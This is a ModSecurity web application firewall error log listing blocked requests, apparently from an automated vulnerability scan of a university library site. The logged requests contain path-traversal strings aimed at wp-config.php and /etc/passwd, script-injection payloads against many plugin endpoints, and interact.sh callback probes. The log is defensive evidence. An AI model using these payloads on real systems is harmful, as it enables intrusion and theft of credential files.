[Tue Aug 29 11:55:57.576061 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAq5@IQAAAAK"]
[Tue Aug 29 11:55:58.614802 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAqY6NgAAAAr"]
[Tue Aug 29 11:55:58.716939 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAApbUsQAAAAh"]
[Tue Aug 29 11:55:59.833666 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAAq@scsAAAAM"]
[Tue Aug 29 11:56:00.665185 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAq5@J8AAAAK"]
[Tue Aug 29 11:56:01.535254 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAArB1uMAAAAV"]
[Tue Aug 29 11:56:01.555003 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAArB1uQAAAAV"]
[Tue Aug 29 11:56:02.605522 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAq@sdsAAAAM"]
[Tue Aug 29 11:56:02.687356 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAArC7dgAAAAW"]
[Tue Aug 29 11:56:03.537023 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAqSw5UAAAAN"]
[Tue Aug 29 11:56:03.539618 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAq5@LIAAAAK"]
[Tue Aug 29 11:56:03.606045 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAAqeFhUAAAAx"]
[Tue Aug 29 11:56:04.667287 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqeFiAAAAAx"]
[Tue Aug 29 11:56:04.735744 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqSw54AAAAN"]
[Tue Aug 29 11:56:05.605263 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApbUu0AAAAh"]
[Tue Aug 29 11:56:05.674891 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAqeFikAAAAx"]
[Tue Aug 29 11:56:06.732863 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqeFjMAAAAx"]
[Tue Aug 29 11:56:06.869125 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16ZsCo-f0AAAq@sfkAAAAM"]
[Tue Aug 29 11:56:07.651997 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAArC7fcAAAAW"]
[Tue Aug 29 11:56:08.571715 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAArC7fwAAAAW"]
[Tue Aug 29 11:56:08.587218 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAq@sgMAAAAM"]
[Tue Aug 29 11:56:10.589186 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApXgsgAAAAU"]
[Tue Aug 29 11:56:10.593597 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv20AAAAa"]
[Tue Aug 29 11:56:11.648287 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAobT-0AAAAQ"]
[Tue Aug 29 11:56:11.667105 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAArC7hMAAAAW"]
[Tue Aug 29 11:56:12.535336 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAq5@NwAAAAK"]
[Tue Aug 29 11:56:12.554622 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAApHRlYAAAAP"]
